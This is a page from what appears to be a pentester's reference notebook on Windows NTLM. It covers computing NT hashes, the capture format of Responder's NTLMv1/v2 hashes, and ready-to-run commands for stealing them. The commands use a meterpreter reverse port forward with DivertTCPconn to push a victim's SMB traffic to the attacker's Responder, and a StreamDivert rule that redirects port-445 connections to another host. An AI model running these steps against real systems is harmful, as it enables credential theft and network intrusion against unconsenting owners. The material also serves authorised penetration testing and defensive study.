Pentester's Promiscuous Notebook
Blog
GitHub
Twitter
Search…
README
⚒️ Pentest
C2
Infrastructure
AD
ACL Abuse
AD CS Abuse
ADIDNS Abuse
Attack Trusts
AV / EDR Evasion
Authentication Coercion
Azure
Credentials Dump
DCSync
Delegation Abuse
Discovery
DnsAdmins
Dominance
GPO Abuse
Kerberos
Key Credentials Abuse
LAPS
Lateral Movement
LDAP
NTLM
NTLM Relay
NTLMv1 Downgrade
Password Spraying
Post Exploitation
PrivExchange
Privileges Abuse
RID Cycling
Roasting
SCCM Abuse
SMB
RPC
Token Manipulation
User Hunt
WSUS
Zerologon
DevOps
DBMS
Authentication Brute Force
File Transfer
IPMI
Kiosk Breakout
Low-Hanging Fruits
LPE
Networks
NFS
Persistence
Pivoting
Post Exploitation
SNMP
TFTP
VNC
Misc
OSINT
Password Brute Force
Perimeter
Shells
Web
Wi-Fi
⚔️ Red Team
Basics
Cobalt Strike
Infrastructure
Malware Development
SE
⚙️ Admin
Git
Linux
Networking
Virtualization
Windows
Powered By
GitBook
NTLM
NT / LM Hashes
https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/
Calculate NTLM
https://www.browserling.com/tools/ntlm-hash
With Python:
>>>
import
hashlib
>>>
hashlib
.
new
(
'md4'
,
'Passw0rd!'
.
encode
(
'utf-16le'
)).
hexdigest
()
Responder Capture Structure
https://github.com/lgandx/Responder/blob/eb449bb061a8eb3944b96b157de73dea444ec46b/servers/SMB.py#L149
https://ru.wikipedia.org/wiki/NTLMv2#NTLMv2
https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/
Andrei Miroshnikov. Windows Security Monitoring: Scenarios and Patterns, Part III, pp. 330-333.
[SMB] NTLMv1 Hash
and
[SMB] NTLMv1-SSP Hash
capture structure:
<Username>:<Domain>:<LMv1_Response>:<NTv1_Response>:<Server_Challenge>
[SMB] NTLMv2-SSP Hash
capture structure:
<Username>:<Domain>:<Server_Challenge>:<LMv2_Response>:<NTv2_Response>
Capture NTLM on Windows
https://reqrypt.org/windivert.html
https://github.com/basil00/Divert
https://googleprojectzero.blogspot.com/2021/08/understanding-network-access-windows-app.html
DivertTCPconn
https://github.com/Arno0x/DivertTCPconn
Divert incoming SMB traffic on Victim to Victim's local port 8445, sent it through a reverse-forwarded port (meterpreter session must be elevated) to Attacker's local 445 port and capture the hashes with Responder:
$ sudo ./Responder.py -I eth0 -Av
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > execute -f divertTCPconn.exe -a "445 8445"
StreamDivert
https://github.com/jellever/StreamDivert
Divert all inbound TCP connections to port 445 (SMB) coming from 192.168.1.11 to 10.10.13.37 port 445:
Cmd > powershell -c "Add-Content conf.txt 'tcp < 445 192.168.1.11 -> 10.10.13.37 445'"
Cmd > .\StreamDivert.exe .\conf.txt -f -v
Previous
LDAP
Next
NTLM Relay
Last modified
2mo ago
Copy link
Outline
Calculate NTLM
Responder Capture Structure
Capture NTLM on Windows
DivertTCPconn
StreamDivert